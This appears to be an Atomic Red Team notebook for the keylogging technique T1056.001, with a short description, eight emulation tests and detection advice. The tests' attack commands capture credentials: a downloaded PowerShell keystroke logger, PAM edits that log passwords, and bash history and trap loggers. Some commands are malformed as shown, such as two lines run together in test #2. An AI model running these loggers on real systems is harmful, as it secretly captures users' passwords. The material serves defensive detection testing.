# T1056.001 - Keylogging
Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:

* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) 

## Atomic Tests

### Atomic Test #1 - Input Capture
Utilize PowerShell and external resource to capture keystrokes
[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)

Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1") -Force | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1 -OutFile "PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1"

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
&"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath $env:TEMP\key.log
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item $env:TEMP\key.log -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d
Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log.  All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.

Passwords hidden by the console can also be logged, with 'log_passwd' as in this example.  If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).

Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary.  Mac OS does not currently contain the pam_tty_audit.so library. 

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Checking if pam_tty_audit.so is installed

##### Check Prereq Commands:
```sh
test -f '/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so'

```
##### Get Prereq Commands:
```sh
echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work"

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 2

#### Cleanup: 
```sh
sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth
sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Logging bash history to syslog
There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.

To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ 

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: This test requires to be run in a bash shell and that logger and tee are installed.

##### Check Prereq Commands:
```sh
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi

```
##### Get Prereq Commands:
```sh
echo ""

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 3

#### Cleanup: 
```sh
unset PROMPT_COMMAND
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Logging sh history to syslog/messages
There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.

To gain persistence the command could be added to the users .shrc or .profile 

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: This test requires to be run in a bash shell and that logger and tee are installed.

##### Check Prereq Commands:
```sh
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi

```
##### Get Prereq Commands:
```sh
echo ""

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
PS2=`logger -t "$USER" -f ~/.sh_history`
$PS2
tail /var/log/messages
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 4

#### Cleanup: 
```sh
unset PS2
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Bash session based keylogger
When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. 

To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ 

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: This test requires to be run in a bash shell

##### Check Prereq Commands:
```bash
if [ "$(echo $0)" != "bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi

```
##### Get Prereq Commands:
```bash
echo ""

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> /tmp/.keyboard.log' DEBUG
echo "Hello World!"
cat /tmp/.keyboard.log
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 5

#### Cleanup: 
```bash
rm /tmp/.keyboard.log
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 5 -Cleanup

### Atomic Test #6 - SSHD PAM keylogger
Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: This test requires sshd and auditd

##### Check Prereq Commands:
```sh
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi

```
##### Get Prereq Commands:
```sh
echo ""

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
systemctl restart auditd
ssh ubuntu@localhost 
whoami
sudo su
whoami
exit
exit
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 6

#### Cleanup: 
```sh
cp -fv /tmp/sshd /etc/pam.d/
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Auditd keylogger
The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. 

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: This test requires sshd and auditd

##### Check Prereq Commands:
```sh
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi

```
##### Get Prereq Commands:
```sh
echo ""

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") 
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 7

#### Cleanup: 
```sh
systemctl restart auditd
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 7 -Cleanup

### Atomic Test #8 - MacOS Swift Keylogger
Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required.
Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74

**Supported Platforms:** macos

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.

##### Check Prereq Commands:
```bash
if [ -f PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift ]; then chmod +x PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift; else exit 1; fi

```
##### Get Prereq Commands:
```bash
echo ""

```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
swift PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift -keylog
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 8

#### Cleanup: 
```bash
kill `pgrep swift-frontend`
```

In [ ]:
Invoke-AtomicTest T1056.001 -TestNumbers 8 -Cleanup

## Detection
Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.